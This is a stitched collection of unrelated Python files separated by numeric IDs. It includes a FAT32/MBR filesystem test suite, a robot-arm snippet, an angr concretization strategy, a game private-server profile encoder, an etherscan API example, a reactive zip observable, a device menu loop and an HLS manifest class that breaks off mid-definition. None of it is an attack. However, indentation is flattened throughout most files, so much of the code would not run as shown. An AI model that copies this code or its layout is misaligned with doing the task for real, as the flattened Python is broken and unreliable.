TEST_IMAGE_PATH = "test.dd"
KILOBYTE = 1024
MEGABYTE = 1024 * KILOBYTE
GIGABYTE = 1024 * MEGABYTE
TERABYTE = 1024 * GIGABYTE
TEST_IMAGE_SIZE = 40 * MEGABYTE
TEST_PART_SIZE = 32 * MEGABYTE
MIN_FS_SIZE = 32 * MEGABYTE
# default linux no boot code
# prints something like, "this volume cannot be booted"
NOBOOT_CODE = bytes(binascii.unhexlify(b"""
0E 1F BE 77 7C AC
22 C0 74 0B 56 B4 0E BB 07 00 CD 10 5E EB F0 32
E4 CD 16 CD 19 EB FE 54 68 69 73 20 69 73 20 6E
6F 74 20 61 20 62 6F 6F 74 61 62 6C 65 20 64 69
73 6B 2E 20 20 50 6C 65 61 73 65 20 69 6E 73 65
72 74 20 61 20 62 6F 6F 74 61 62 6C 65 20 66 6C
6F 70 70 79 20 61 6E 64 0D 0A 70 72 65 73 73 20
61 6E 79 20 6B 65 79 20 74 6F 20 74 72 79 20 61
67 61 69 6E 20 2E 2E 2E 20 0D 0A""".lstrip(b"\x00").rstrip().replace(b" ", b"").replace(b"\n", b"")))
def set_first_partition_fat32(path, size):
    with mbr.MBR(path) as m:
for i, _ in m.Partitions:
part_entry = m.Partitions[i]
if part_entry.TotalSectors != 0 or part_entry.RelativeSector != 0:
raise RuntimeError("cannot update existing partition table with existing partitions")
size_in_sectors = size // mbr.SECTOR_SIZE
part_entry = m.Partitions[0]
part_entry.BootIndicator = mbr.BOOTINDICATOR.NOBOOT
        # CHS fields can be left zero when LBA addressing is used
        # via: https://en.wikipedia.org/wiki/Master_boot_record
part_entry.StartingHead = 0x0
part_entry.StartingSectCylinder = 0x0
part_entry.SystemID = mbr.SYSTEMID.PRI_FAT32_INT13
part_entry.EndingHead = 0x0
part_entry.EndingSectCylinder = 0x0
part_entry.RelativeSector = 2048
part_entry.TotalSectors = size_in_sectors
m.EndOfSectorMarker = 0xAA55
def create_fat32_filesystem(path, partition_offset, size):
if size < MIN_FS_SIZE:
raise RuntimeError("min FAT32 file system size is 32MB (with 512 byte sectors)")
fs = fat32.FAT32(True)
with open(path, "r+b") as f:
fs.vsLoad(f, partition_offset, writeback=True)
fs.bpb.BPB_jmpBoot = b"\xEB\x58\x90"
fs.bpb.BPB_OEMName = b"mkfs.fat"
fs.bpb.BPB_BytsPerSec = mbr.SECTOR_SIZE
# via: https://support.microsoft.com/en-us/kb/140365
if size < 64 * MEGABYTE:
fs.bpb.BPB_SecPerClus = 512 // mbr.SECTOR_SIZE
elif 64 * MEGABYTE <= size < 128 * MEGABYTE:
fs.bpb.BPB_SecPerClus = 1024 // mbr.SECTOR_SIZE
elif 128 * MEGABYTE <= size < 256 * MEGABYTE:
fs.bpb.BPB_SecPerClus = 2048 // mbr.SECTOR_SIZE
elif 256 * MEGABYTE <= size < 8 * GIGABYTE:
fs.bpb.BPB_SecPerClus = 4096 // mbr.SECTOR_SIZE
elif 8 * GIGABYTE <= size < 16 * GIGABYTE:
fs.bpb.BPB_SecPerClus = 8192 // mbr.SECTOR_SIZE
elif 16 * GIGABYTE <= size < 32 * GIGABYTE:
fs.bpb.BPB_SecPerClus = 16384 // mbr.SECTOR_SIZE
else:
raise RuntimeError("file system size greater than 2TB not supported")
fs.bpb.BPB_RsvdSecCnt = 32 # from Linux example
fs.bpb.BPB_NumFATs = 2
fs.bpb.BPB_RootEntCnt = 0
total_sector_count = size // mbr.SECTOR_SIZE
if total_sector_count < 0xFFFF:
fs.bpb.BPB_TotSec16 = total_sector_count
fs.bpb.BPB_TotSec32 = 0
else:
fs.bpb.BPB_TotSec16 = 0
fs.bpb.BPB_TotSec32 = total_sector_count
fs.bpb.BPB_Media = 248 # from Linux example
fs.bpb.BPB_FATSz16 = 0
        # CHS fields can be left zero when LBA addressing is used
        # via: https://en.wikipedia.org/wiki/Master_boot_record
fs.bpb.BPB_SecPerTrk = 0
fs.bpb.BPB_NumHeads = 0
fs.bpb.BPB_HiddSec = 0
total_cluster_count = total_sector_count // fs.bpb.BPB_SecPerClus
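        # each FAT32 entry is 4 bytes, so a full FAT occupies
        # 4 * total_cluster_count bytes, expressed here in sectors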
fs.bpb.BPB_FATSz32 = (4 * total_cluster_count) // mbr.SECTOR_SIZE
fs.bpb.BPB_ExtFlags = 0
fs.bpb.BPB_FSVer = 0
fs.bpb.BPB_RootClus = 2
fs.bpb.BPB_FSInfo = 1
fs.bpb.BPB_BkBootSec = 6
fs.bpb.BPB_DrvNum = 128 # from Linux example
fs.bpb.BPB_Reserved1 = 0
fs.bpb.BPB_BootSig = 41
fs.bpb.BPB_VolID = 4107516940 # from Linux example
fs.bpb.BPB_VolLab = b"NO NAME "
fs.bpb.BPB_FilSysType = b"FAT32 "
fs.bpb.BPB_BootCode = NOBOOT_CODE
fs.bpb.EndOfSectorMarker = 0xAA55
        # when the FS is first parsed, it may not create structures for the
# backup BPB, FS info, or FATs, since they're not referenced in a NULL primary BPB.
# so, we reload the FS using the initial BPB set just above.
with open(path, "r+b") as f:
fs.vsLoad(f, partition_offset, writeback=True)
fs.bpb_backup.BPB_jmpBoot = fs.bpb.BPB_jmpBoot
fs.bpb_backup.BPB_OEMName = fs.bpb.BPB_OEMName
fs.bpb_backup.BPB_BytsPerSec = fs.bpb.BPB_BytsPerSec
fs.bpb_backup.BPB_SecPerClus = fs.bpb.BPB_SecPerClus
fs.bpb_backup.BPB_RsvdSecCnt = fs.bpb.BPB_RsvdSecCnt
fs.bpb_backup.BPB_NumFATs = fs.bpb.BPB_NumFATs
fs.bpb_backup.BPB_RootEntCnt = fs.bpb.BPB_RootEntCnt
fs.bpb_backup.BPB_TotSec16 = fs.bpb.BPB_TotSec16
fs.bpb_backup.BPB_TotSec32 = fs.bpb.BPB_TotSec32
fs.bpb_backup.BPB_Media = fs.bpb.BPB_Media
fs.bpb_backup.BPB_FATSz16 = fs.bpb.BPB_FATSz16
fs.bpb_backup.BPB_SecPerTrk = fs.bpb.BPB_SecPerTrk
fs.bpb_backup.BPB_NumHeads = fs.bpb.BPB_NumHeads
fs.bpb_backup.BPB_HiddSec = fs.bpb.BPB_HiddSec
fs.bpb_backup.BPB_FATSz32 = fs.bpb.BPB_FATSz32
fs.bpb_backup.BPB_ExtFlags = fs.bpb.BPB_ExtFlags
fs.bpb_backup.BPB_FSVer = fs.bpb.BPB_FSVer
fs.bpb_backup.BPB_RootClus = fs.bpb.BPB_RootClus
fs.bpb_backup.BPB_FSInfo = fs.bpb.BPB_FSInfo
fs.bpb_backup.BPB_BkBootSec = fs.bpb.BPB_BkBootSec
fs.bpb_backup.BPB_DrvNum = fs.bpb.BPB_DrvNum
fs.bpb_backup.BPB_Reserved1 = fs.bpb.BPB_Reserved1
fs.bpb_backup.BPB_BootSig = fs.bpb.BPB_BootSig
fs.bpb_backup.BPB_VolID = fs.bpb.BPB_VolID
fs.bpb_backup.BPB_VolLab = fs.bpb.BPB_VolLab
fs.bpb_backup.BPB_FilSysType = fs.bpb.BPB_FilSysType
fs.bpb_backup.BPB_BootCode = fs.bpb.BPB_BootCode
fs.bpb_backup.EndOfSectorMarker = fs.bpb.EndOfSectorMarker
for f in fs.getFats():
f[0] = 0x0FFFFFF8 # from Linux sample
f[1] = 0x0FFFFFFF
# set root dir cluster chain
f[2] = fat32.CLUSTER_TYPES.LAST
fs.fs_info.FSI_LeadSig = 0x41615252
fs.fs_info.FSI_StrucSig = 0x61417272
fs.fs_info.FSI_TailSig = 0xAA550000
@contextlib.contextmanager
def test_image():
try:
os.remove(TEST_IMAGE_PATH)
except:
pass
with open(TEST_IMAGE_PATH, "wb") as f:
f.write(b"\x00" * TEST_IMAGE_SIZE)
try:
yield
finally:
try:
os.remove(TEST_IMAGE_PATH)
except:
pass
@contextlib.contextmanager
def test_fs():
with test_image():
set_first_partition_fat32(TEST_IMAGE_PATH, TEST_PART_SIZE)
with mbr.MBR(TEST_IMAGE_PATH) as m:
partition_offset = m.Partitions[0].RelativeSector * mbr.SECTOR_SIZE
create_fat32_filesystem(TEST_IMAGE_PATH, partition_offset, TEST_PART_SIZE)
fs = fat32.FAT32(False)
with open(TEST_IMAGE_PATH, "r+b") as f:
fs.vsLoad(f, partition_offset, writeback=True)
yield fs
@contextlib.contextmanager
def test_logical_fs():
with test_fs() as fs:
yield fat32.FAT32LogicalFileSystem(fs)
class TestPyFAT(unittest.TestCase):
def test_make_partition(self):
with test_image():
set_first_partition_fat32(TEST_IMAGE_PATH, TEST_PART_SIZE)
with mbr.MBR(TEST_IMAGE_PATH) as m:
self.assertEqual(m.Partitions[0].SystemID, mbr.SYSTEMID.PRI_FAT32_INT13)
self.assertEqual(m.Partitions[0].RelativeSector, 2048)
self.assertEqual(m.Partitions[0].TotalSectors, TEST_PART_SIZE // mbr.SECTOR_SIZE)
def test_make_filesystem(self):
with test_image():
set_first_partition_fat32(TEST_IMAGE_PATH, TEST_PART_SIZE)
with test_fs() as fs:
self.assertEqual(fs.bpb.BPB_NumFATs, 2)
self.assertEqual(fs.bpb_backup.BPB_NumFATs, 2)
def test_cluster_access(self):
with test_fs() as fs:
# test directly set cluster content
self.assertEqual(len(fs.clusters[3]), fs.getClusterSize())
self.assertEqual(bytes(fs.clusters[3]), b"\x00" * fs.getClusterSize())
fs.clusters[3] = b"\x69" * fs.getClusterSize()
self.assertEqual(bytes(fs.clusters[3]), b"\x69" * fs.getClusterSize())
# although the data is set, the cluster is still free
# FAT table: [0] reserved, [1] reserved, [2] root, [3] free, [4] free
self.assertEqual(fs.isClusterFree(3), True)
# since nothing's been allocated, clusters 0 and 1 are reserved, root entry is 2,
# so the first free cluster is 3
self.assertEqual(fs.getFreeClusterNumber(), 3)
# FAT table: [0] reserved, [1] reserved, [2] root, [3] LAST, [4] free
fs.markClusterUsed(3)
self.assertEqual(fs.isClusterFree(3), False)
self.assertEqual(fs.getFreeClusterNumber(), 4)
self.assertEqual(fs.getClusterChain(3), [3, fat32.CLUSTER_TYPES.LAST])
# FAT table: [0] reserved, [1] reserved, [2] root, [3] free, [4] free
fs.markClusterFree(3)
self.assertEqual(fs.isClusterFree(3), True)
# FAT table: [0] reserved, [1] reserved, [2] root, [3] 4, [4] LAST
fs.markClusterUsed(4)
fs.markClusterUsed(3, 4)
self.assertEqual(fs.getClusterChain(3), [3, 4, fat32.CLUSTER_TYPES.LAST])
fs.markClusterFree(3)
fs.markClusterFree(4)
# test small run
with self.assertRaises(fat32.FileDoesNotExistException):
fs.getContent(3)
p = fs.addContent(b"hello world!")
self.assertEqual(fs.getContent(p).rstrip(b"\x00"), b"hello world!")
fs.delContent(p)
with self.assertRaises(fat32.FileDoesNotExistException):
fs.getContent(p)
# test empty run
with self.assertRaises(fat32.FileDoesNotExistException):
fs.getContent(3)
p = fs.addContent(b"")
self.assertEqual(fs.getContent(p).rstrip(b"\x00"), b"")
fs.delContent(p)
with self.assertRaises(fat32.FileDoesNotExistException):
fs.getContent(p)
# test writing and overwriting data runs with smaller, equal, and bigger data
cases = [
{"cluster_count_one": 0, "cluster_count_two": 0},
{"cluster_count_one": 0, "cluster_count_two": 1},
{"cluster_count_one": 0, "cluster_count_two": 2},
{"cluster_count_one": 1, "cluster_count_two": 0},
{"cluster_count_one": 1, "cluster_count_two": 1},
{"cluster_count_one": 1, "cluster_count_two": 2},
{"cluster_count_one": 2, "cluster_count_two": 0},
{"cluster_count_one": 2, "cluster_count_two": 1},
{"cluster_count_one": 2, "cluster_count_two": 2}
]
for case in cases:
v1 = b"A" * fs.getClusterSize() * case["cluster_count_one"]
v2 = b"B" * fs.getClusterSize() * case["cluster_count_two"]
p = fs.addContent(v1)
self.assertEqual(fs.getContent(p).rstrip(b"\x00"), v1)
fs.setContent(p, v2)
self.assertEqual(fs.getContent(p).rstrip(b"\x00"), v2)
fs.delContent(p)
def test_directories83(self):
with test_logical_fs() as fs:
self.assertEqual(list(fs.listFiles()), [])
self.assertEqual(list(fs.listDirectories()), [])
with self.assertRaises(fat32.FileDoesNotExistException):
fs.readFile("/DNE.TXT")
with self.assertRaises(fat32.FileDoesNotExistException):
fs.delDirectory("/TEST")
fs.addDirectory("/TEST")
self.assertEqual(list(fs.listDirectories()), ["/TEST"])
with self.assertRaises(fat32.FileExistsException):
fs.addDirectory("/TEST")
fs.delDirectory("/TEST")
self.assertEqual(list(fs.listDirectories()), [])
def test_files83(self):
with test_logical_fs() as fs:
self.assertEqual(list(fs.listFiles()), [])
self.assertEqual(list(fs.listDirectories()), [])
with self.assertRaises(fat32.FileDoesNotExistException):
fs.readFile("/DNE.TXT")
with self.assertRaises(fat32.FileDoesNotExistException):
fs.delFile("/TEST.TXT")
fs.addFile("/TEST.TXT", b"AA")
self.assertEqual(list(fs.listFiles()), ["/TEST.TXT"])
self.assertEqual(fs.readFile("/TEST.TXT"), b"AA")
with self.assertRaises(fat32.FileExistsException):
fs.addFile("/TEST.TXT", b"BB")
fs.delFile("/TEST.TXT")
self.assertEqual(list(fs.listFiles()), [])
# can't simply list directories, since we support long names
# so need to access the files by short name directly
fs.addFile("/TEST-LONG.TXT", b"AA")
self.assertEqual(fs.readFile("/TEST-L~0.TXT"), b"AA")
fs.addFile("/TEST-LONG1.TXT", b"BB")
self.assertEqual(fs.readFile("/TEST-L~1.TXT"), b"BB")
def test_directories(self):
with test_logical_fs() as fs:
self.assertEqual(list(fs.listFiles()), [])
self.assertEqual(list(fs.listDirectories()), [])
with self.assertRaises(fat32.FileDoesNotExistException):
fs.readFile("/dne.txt")
with self.assertRaises(fat32.FileDoesNotExistException):
fs.delDirectory("/test-longlong")
# this value extracted from an entry created by the Windows FAT32 driver
self.assertEqual(fat32.DIRECTORY_DATA.compute83Hash("TEST-L~1 "), 0x7)
fs.addDirectory("/test-longlonglonglong")
self.assertEqual(list(fs.listDirectories()), ["/test-longlonglonglong"])
with self.assertRaises(fat32.FileExistsException):
fs.addDirectory("/test-longlonglonglong")
fs.addDirectory("/test-longlonglonglong/hahahahahahahahahaha")
self.assertEqual(list(fs.listDirectories()), ["/test-longlonglonglong", "/test-longlonglonglong/hahahahahahahahahaha"])
with self.assertRaises(fat32.DirectoryNotEmptyException):
fs.delDirectory("/test-longlonglonglong")
fs.delDirectory("/test-longlonglonglong/hahahahahahahahahaha")
self.assertEqual(list(fs.listDirectories()), ["/test-longlonglonglong"])
fs.delDirectory("/test-longlonglonglong")
self.assertEqual(list(fs.listDirectories()), [])
def test_files(self):
with test_logical_fs() as fs:
self.assertEqual(list(fs.listFiles()), [])
self.assertEqual(list(fs.listDirectories()), [])
with self.assertRaises(fat32.FileDoesNotExistException):
fs.readFile("/dne.txt")
with self.assertRaises(fat32.FileDoesNotExistException):
fs.delFile("/test-longlong.txt")
fs.addFile("/test-longlong.txt", b"AA")
self.assertEqual(list(fs.listFiles()), ["/test-longlong.txt"])
self.assertEqual(fs.readFile("/test-longlong.txt"), b"AA")
with self.assertRaises(fat32.FileExistsException):
fs.addFile("/test-longlong.txt", b"AA")
fs.delFile("/test-longlong.txt")
self.assertEqual(list(fs.listFiles()), [])
fs.addDirectory("/test-longlonglonglong")
self.assertEqual(list(fs.listDirectories()), ["/test-longlonglonglong"])
fs.addFile("/test-longlonglonglong/test-longlong.txt", b"AA")
self.assertEqual(list(fs.listFiles()), ["/test-longlonglonglong/test-longlong.txt"])
self.assertEqual(fs.readFile("/test-longlonglonglong/test-longlong.txt"), b"AA")
with self.assertRaises(fat32.DirectoryNotEmptyException):
fs.delDirectory("/test-longlonglonglong")
self.assertEqual(list(fs.listFiles()), ["/test-longlonglonglong/test-longlong.txt"])
fs.delFile("/test-longlonglonglong/test-longlong.txt")
self.assertEqual(list(fs.listFiles()), [])
fs.delDirectory("/test-longlonglonglong")
def test():
import sys
if "-v" in sys.argv or "--verbose" in sys.argv:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
try:
unittest.main()
except SystemExit:
pass
if __name__ == '__main__':
test()
|
116605
|
def armsinside():
i01.rightArm.rotate.attach()
i01.rightArm.rotate.moveTo(0)
sleep(7)
i01.rightArm.rotate.detach()
|
116614
|
from . import SimConcretizationStrategy
class SimConcretizationStrategyRange(SimConcretizationStrategy):
"""
Concretization strategy that resolves addresses to a range.
"""
def __init__(self, limit, **kwargs): #pylint:disable=redefined-builtin
super(SimConcretizationStrategyRange, self).__init__(**kwargs)
self._limit = limit
def _concretize(self, memory, addr):
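        # Added note: ask the solver for the feasible [min, max] of addr and
        # only enumerate up to self._limit concrete solutions when the range
        # is narrow enough; falling off the end (returning None) signals that
        # this strategy declined and the next strategy should be tried.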
mn,mx = self._range(memory, addr)
if mx - mn <= self._limit:
return self._eval(memory, addr, self._limit)
|
116642
|
from Classes.Logic.LogicLong import LogicLong
from Classes.Wrappers.PlayerDisplayData import PlayerDisplayData
class PlayerProfile:
def encode(calling_instance, fields, playerData):
calling_instance.encodeLogicLong(LogicLong(fields["PlayerID"][0], fields["PlayerID"][1]))
calling_instance.writeDataReference(0)
sortedBrawlers = sorted(playerData["OwnedBrawlers"], key=lambda x: (playerData["OwnedBrawlers"][x]['Trophies']), reverse=True)
calling_instance.writeVInt(len(sortedBrawlers))
for brawlerID in sortedBrawlers:
brawlerData = playerData["OwnedBrawlers"][brawlerID]
calling_instance.writeDataReference(16, brawlerID)
if brawlerData["Skins"] != []:
calling_instance.writeDataReference(29, brawlerData["Skins"][0]) # TODO: Sync with current skin
else:
calling_instance.writeDataReference(0)
calling_instance.writeVInt(brawlerData["Trophies"])
calling_instance.writeVInt(brawlerData["HighestTrophies"])
calling_instance.writeVInt(brawlerData["PowerLevel"])
calling_instance.writeVInt(16)
calling_instance.writeVInt(1)
calling_instance.writeVInt(9999)
calling_instance.writeVInt(2)
calling_instance.writeVInt(playerData["Experience"])
calling_instance.writeVInt(3)
calling_instance.writeVInt(playerData["Trophies"])
calling_instance.writeVInt(4)
calling_instance.writeVInt(playerData["HighestTrophies"])
calling_instance.writeVInt(5)
calling_instance.writeVInt(len(sortedBrawlers))
calling_instance.writeVInt(8)
calling_instance.writeVInt(9999)
calling_instance.writeVInt(11)
calling_instance.writeVInt(9999)
calling_instance.writeVInt(9)
calling_instance.writeVInt(0)
calling_instance.writeVInt(12)
calling_instance.writeVInt(0)
calling_instance.writeVInt(13)
calling_instance.writeVInt(100)
calling_instance.writeVInt(14)
calling_instance.writeVInt(0)
calling_instance.writeVInt(15)
calling_instance.writeVInt(9999)
calling_instance.writeVInt(16)
calling_instance.writeVInt(0)
calling_instance.writeVInt(18)
calling_instance.writeVInt(0)
calling_instance.writeVInt(17)
calling_instance.writeVInt(0)
calling_instance.writeVInt(19)
calling_instance.writeVInt(0)
PlayerDisplayData.encode(calling_instance, playerData)
def decode(calling_instance, fields):
pass
|
116660
|
from etherscan.blocks import Blocks
import json
with open('../../api_key.json', mode='r') as key_file:
key = json.loads(key_file.read())['key']
api = Blocks(api_key=key)
reward = api.get_block_reward(2165403)
print(reward)
|
116675
|
import itertools
import threading
from traceback import FrameSummary
from typing import Callable, Any, Optional, List
from rx.disposable import CompositeDisposable
from rxbp.acknowledgement.acksubject import AckSubject
from rxbp.acknowledgement.ack import Ack
from rxbp.acknowledgement.continueack import continue_ack
from rxbp.acknowledgement.stopack import stop_ack, StopAck
from rxbp.observable import Observable
from rxbp.observer import Observer
from rxbp.observerinfo import ObserverInfo
from rxbp.states.measuredstates.terminationstates import TerminationStates
from rxbp.states.measuredstates.zipstates import ZipStates
from rxbp.states.rawstates.rawterminationstates import RawTerminationStates
from rxbp.states.rawstates.rawzipstates import RawZipStates
from rxbp.typing import ElementType
from rxbp.utils.tooperatorexception import to_operator_exception
class ZipObservable(Observable):
"""
An observable that zips the elements of a left and right observable.
The following illustrates the function call stack of the following subscription:
disposable = s1.zip(s2).subscribe(o, scheduler=s)
^ callstack zip zip
| / /
| o s1 o s1
| / / ack1 / / ack1
| zip zip -- zip --
| / / /
| s1 s2----------- ----------- ...
| / /
| s s time
--------------------------------------------->
s: scheduler
s1: source 1 (left observable)
s2: source 2 (right observable)
zip: zip operator
o: output observer
ack1: asynchronous acknowledgment returned by zip.on_next called by s1
"""
def __init__(
self,
left: Observable,
right: Observable,
stack: List[FrameSummary],
):
"""
:param left: left observable
:param right: right observable
        :param stack: call-stack frames used to build readable operator exceptions
"""
super().__init__()
self.left = left
self.right = right
self.stack = stack
self.lock = threading.RLock()
# Zip2Observable states
self.observer: Optional[Observer] = None
self.termination_state = RawTerminationStates.InitState()
self.state: RawZipStates.ZipState = RawZipStates.WaitOnLeftRight()
def _iterate_over_batch(self, elem: ElementType, is_left: bool):
"""
        this function is called on each `on_next` call from the left or right observable
"""
# if elem is a list, make an iterator out of it
iterable = iter(elem)
# in case the zip process is started and the output observer returns a synchronous acknowledgment,
# then `upstream_ack` is not actually needed; nevertheless, it is created here, because it makes
# the code simpler
upstream_ack = AckSubject()
# prepare next raw state
next_state = RawZipStates.ElementReceived(
is_left=is_left,
ack=upstream_ack,
iter=iterable,
)
        # synchronously update the state
with self.lock:
next_state.prev_raw_state = self.state
next_state.prev_raw_termination_state = self.termination_state
self.state = next_state
meas_state = next_state.get_measured_state(next_state.prev_raw_termination_state)
# pattern match measured state
if isinstance(meas_state, ZipStates.Stopped):
return stop_ack
# wait on other observable
elif isinstance(meas_state, ZipStates.WaitOnRight) or isinstance(meas_state, ZipStates.WaitOnLeft):
return upstream_ack
# start zipping operation
elif isinstance(meas_state, ZipStates.ZipElements):
if is_left:
other_upstream_ack = meas_state.right_ack
else:
other_upstream_ack = meas_state.left_ack
else:
raise Exception(f'unknown state "{meas_state}", is_left {is_left}')
# in case left and right batch don't match in number of elements,
# n1 will not be None after zipping
n1 = [None]
def gen_zipped_elements():
""" generate a sequence of zipped elements """
while True:
n1[0] = None
try:
n1[0] = next(meas_state.left_iter)
n2 = next(meas_state.right_iter)
except StopIteration:
break
# yield self.selector(n1[0], n2)
yield (n1[0], n2)
try:
# zip left and right batch
zipped_elements = list(gen_zipped_elements())
except Exception as exc:
# self.observer.on_error(exc)
other_upstream_ack.on_next(stop_ack)
# return stop_ack
raise Exception(to_operator_exception(
message='',
stack=self.stack,
))
if 0 < len(zipped_elements):
downstream_ack = self.observer.on_next(zipped_elements)
else:
downstream_ack = continue_ack
if isinstance(downstream_ack, StopAck):
other_upstream_ack.on_next(stop_ack)
return stop_ack
# request new element from left source
if n1[0] is None:
new_left_iter = None
request_new_elem_from_left = True
# request new element also from right source?
try:
val = next(meas_state.right_iter)
new_right_iter = itertools.chain([val], meas_state.right_iter)
request_new_elem_from_right = False
# request new element from left and right source
except StopIteration:
new_right_iter = None
request_new_elem_from_right = True
# request new element only from right source
else:
new_left_iter = itertools.chain(n1, meas_state.left_iter)
new_right_iter = None
request_new_elem_from_left = False
request_new_elem_from_right = True
# define next state after zipping
# -------------------------------
# request new element from both sources
if request_new_elem_from_left and request_new_elem_from_right:
next_state = RawZipStates.WaitOnLeftRight()
# request new element only from right source
elif request_new_elem_from_right:
next_state = RawZipStates.WaitOnRight(
left_iter=new_left_iter,
left_ack=meas_state.left_ack,
)
# request new element only from left source
elif request_new_elem_from_left:
next_state = RawZipStates.WaitOnLeft(
right_iter=new_right_iter,
right_ack=meas_state.right_ack,
)
else:
raise Exception('after the zip operation, a new element needs '
'to be requested from at least one source')
with self.lock:
# get termination state
raw_prev_termination_state = self.termination_state
# set next state
self.state = next_state
meas_state = next_state.get_measured_state(raw_prev_termination_state)
# stop zip observable
# previous state cannot be "Stopped", therefore don't check previous state
if isinstance(meas_state, ZipStates.Stopped):
prev_termination_state = raw_prev_termination_state.get_measured_state()
if isinstance(prev_termination_state, TerminationStates.ErrorState):
self.observer.on_error(prev_termination_state.ex)
other_upstream_ack.on_next(stop_ack)
return stop_ack
else:
self.observer.on_completed()
other_upstream_ack.on_next(stop_ack)
return stop_ack
# request new elements
else:
if request_new_elem_from_left and request_new_elem_from_right:
downstream_ack.subscribe(other_upstream_ack)
return downstream_ack
elif request_new_elem_from_right:
if is_left:
downstream_ack.subscribe(other_upstream_ack)
else:
return downstream_ack
elif request_new_elem_from_left:
if is_left:
return downstream_ack
else:
downstream_ack.subscribe(other_upstream_ack)
else:
raise Exception('at least one side should be back-pressured')
return upstream_ack
def _on_next_left(self, elem: ElementType):
return_ack = self._iterate_over_batch(elem=elem, is_left=True)
return return_ack
def _on_next_right(self, elem: ElementType):
return_ack = self._iterate_over_batch(elem=elem, is_left=False)
return return_ack
def _signal_on_complete_or_on_error(
self,
state: ZipStates.ZipState,
exc: Exception = None,
):
"""
this function is called once
"""
# stop active acknowledgments
if isinstance(state, ZipStates.WaitOnLeftRight):
pass
elif isinstance(state, ZipStates.WaitOnLeft):
state.right_ack.on_next(stop_ack)
elif isinstance(state, ZipStates.WaitOnRight):
state.left_ack.on_next(stop_ack)
else:
pass
# terminate observer
if exc:
self.observer.on_error(exc)
else:
self.observer.on_completed()
def _on_error_or_complete(
self,
next_final_state: RawTerminationStates.TerminationState,
exc: Exception = None,
):
with self.lock:
raw_prev_final_state = self.termination_state
raw_prev_state = self.state
next_final_state.raw_prev_state = raw_prev_final_state
self.termination_state = next_final_state
prev_state = raw_prev_state.get_measured_state(raw_prev_final_state)
curr_state = raw_prev_state.get_measured_state(next_final_state)
if not isinstance(prev_state, ZipStates.Stopped) \
and isinstance(curr_state, ZipStates.Stopped):
self._signal_on_complete_or_on_error(prev_state, exc=exc)
def _on_error(self, exc: Exception):
# next_final_state = RawTerminationStates.ErrorState(exc=exc)
#
# self._on_error_or_complete(next_final_state=next_final_state, exc=exc)
self.observer.on_error(exc)
def _on_completed_left(self):
next_final_state = RawTerminationStates.LeftCompletedState()
self._on_error_or_complete(next_final_state=next_final_state)
def _on_completed_right(self):
next_final_state = RawTerminationStates.RightCompletedState()
self._on_error_or_complete(next_final_state=next_final_state)
def observe(self, observer_info: ObserverInfo):
self.observer = observer_info.observer
class ZipLeftObserver(Observer):
def on_next(_, elem: ElementType) -> Ack:
return self._on_next_left(elem)
def on_error(_, exc: Exception):
self._on_error(exc)
def on_completed(_):
self._on_completed_left()
class ZipRightObserver(Observer):
def on_next(_, elem: ElementType) -> Ack:
return self._on_next_right(elem)
def on_error(_, exc: Exception):
self._on_error(exc)
def on_completed(_):
self._on_completed_right()
left_observer = ZipLeftObserver()
left_subscription = observer_info.copy(
observer=left_observer,
)
d1 = self.left.observe(left_subscription)
right_observer = ZipRightObserver()
right_subscription = observer_info.copy(
observer=right_observer,
)
d2 = self.right.observe(right_subscription)
return CompositeDisposable(d1, d2)
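# Hedged illustration of the batch-zipping semantics implemented above, written
# as plain Python outside the rxbp machinery: elements are paired until one
# batch runs dry, and a left element that was pulled without a right partner is
# chained back in front of the leftover batch (the n1/itertools.chain trick in
# `_iterate_over_batch`). `itertools` is already imported at the top of this
# module; the helper name below is hypothetical.
def _zip_batches_sketch(left_batch, right_batch):
    left_it, right_it = iter(left_batch), iter(right_batch)
    zipped = []
    while True:
        try:
            left = next(left_it)
        except StopIteration:
            return zipped, [], list(right_it)
        try:
            right = next(right_it)
        except StopIteration:
            # `left` was already consumed, so put it back in front of the leftover
            return zipped, list(itertools.chain([left], left_it)), []
        zipped.append((left, right))
# e.g. _zip_batches_sketch([1, 2, 3], ['a']) == ([(1, 'a')], [2, 3], [])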
|
116687
|
import os
import threading
import Menu_Page_Router
from GPIO_Init import checkKeyInterrupt
from OP_1_Connection import autoMountUnmontThread
from file_util import createImportantFolders
__author__ = "<NAME> (<NAME>)"
__date__ = "2019-04-02"
workDir = os.path.dirname(os.path.realpath(__file__))
def start():
# create important missing folders
createImportantFolders()
threading.Thread(target=autoMountUnmontThread).start()
currentCursor = 1
# Initialize Menu System
pg = Menu_Page_Router.PageRouter()
# Start First Page
pg.renderPage(0, currentCursor)
    while True:
key = checkKeyInterrupt()
if key == "UP":
if currentCursor - 1 >= 1:
currentCursor -= 1
pg.renderPage(0, currentCursor)
elif key == "DOWN":
if currentCursor + 1 < pg.getListSize():
currentCursor += 1
pg.renderPage(0, currentCursor)
elif key == "LEFT":
# currentCursor = 1
currentCursor = pg.renderPage(-1, 1)
pg.renderPage(0, currentCursor)
elif key == "RIGHT":
pg.renderPage(1, currentCursor)
currentCursor = 1
elif key == "CENTER":
pg.renderPage(1, currentCursor)
currentCursor = 1
        elif key == "B":
            pg.renderPage(1, currentCursor)
            currentCursor = 1
        elif key == "A":
            currentCursor = pg.renderPage(-1, 1)
            pg.renderPage(0, currentCursor)
if __name__ == "__main__":
start()
|
116743
|
from ..abstract_manifest import AbstractManifest
from bitmovin.errors import InvalidTypeError
from bitmovin.resources.enums.hls_version import HlsVersion
class HlsManifest(AbstractManifest):
def __init__(self, manifest_name, outputs, name=None, description=None, id_=None, custom_data=None,
hls_media_playlist_version=None, hls_master_playlist_version=None):
super().__init__(id_=id_, custom_data=custom_data, manifest_name=manifest_name, outputs=outputs,
name=name, description=description)
self._hlsMediaPlaylistVersion = None
self.hlsMediaPlaylistVersion = hls_media_playlist_version
self._hlsMasterPlaylistVersion = None
self.hlsMasterPlaylistVersion = hls_master_playlist_version
@property
def hlsMediaPlaylistVersion(self):
return self._hlsMediaPlaylistVersion
@hlsMediaPlaylistVersion.setter
def hlsMediaPlaylistVersion(self, new_hls_media_playlist_version):
if new_hls_media_playlist_version is None:
self._hlsMediaPlaylistVersion = None
elif isinstance(new_hls_media_playlist_version, HlsVersion):
self._hlsMediaPlaylistVersion = new_hls_media_playlist_version.value
elif isinstance(new_hls_media_playlist_version, int):
self._hlsMediaPlaylistVersion = new_hls_media_playlist_version
else:
            raise InvalidTypeError('hlsMediaPlaylistVersion has to be of type HlsVersion or int')
@property
def hlsMasterPlaylistVersion(self):
return self._hlsMasterPlaylistVersion
@hlsMasterPlaylistVersion.setter
